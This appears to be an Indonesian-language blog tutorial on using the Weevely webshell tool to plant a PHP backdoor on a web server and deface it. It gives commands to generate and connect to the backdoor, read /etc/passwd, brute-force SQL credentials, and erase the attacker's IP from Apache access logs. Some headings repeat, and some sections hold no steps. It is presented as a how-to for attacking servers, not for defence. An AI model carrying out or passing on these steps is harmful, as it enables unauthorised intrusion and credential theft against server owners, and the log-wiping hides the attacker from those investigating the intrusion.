Weevely merupakan sebuah Webshell Management Tool yang ditulis
menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk
sistem operasi Linux.
Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?
Langsung saja ke langkah-langkahnya.
Instalasi
Cara menjalankan Weevely
Membuat sebuah Backdoor
Koneksikan ke Backdoor
Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?
Langsung saja ke langkah-langkahnya.
Instalasi
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev
Cara menjalankan Weevely
Membuat sebuah Backdoor
root@ddos:~# weevely generate ddos ddos.php*bd core ddos.php modules utils weevely.py
Koneksikan ke Backdoor
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.
Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
www-data@ddos:/var/log $ system_info -info client_ip
Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
Silahkan uji apakah Ip telah berhasil kita hapus
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
www-data@ddos:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
www-data@ddos:/var/log/apache2 $
Lalu kita ganti file cleaned.log dengan access.log.1
www-data@ddos:/var/log/apache2 $ rm access.log.1
www-data@ddos:/var/log/apache2 $ mv cleaned.log access.log.1
0 comments:
Post a Comment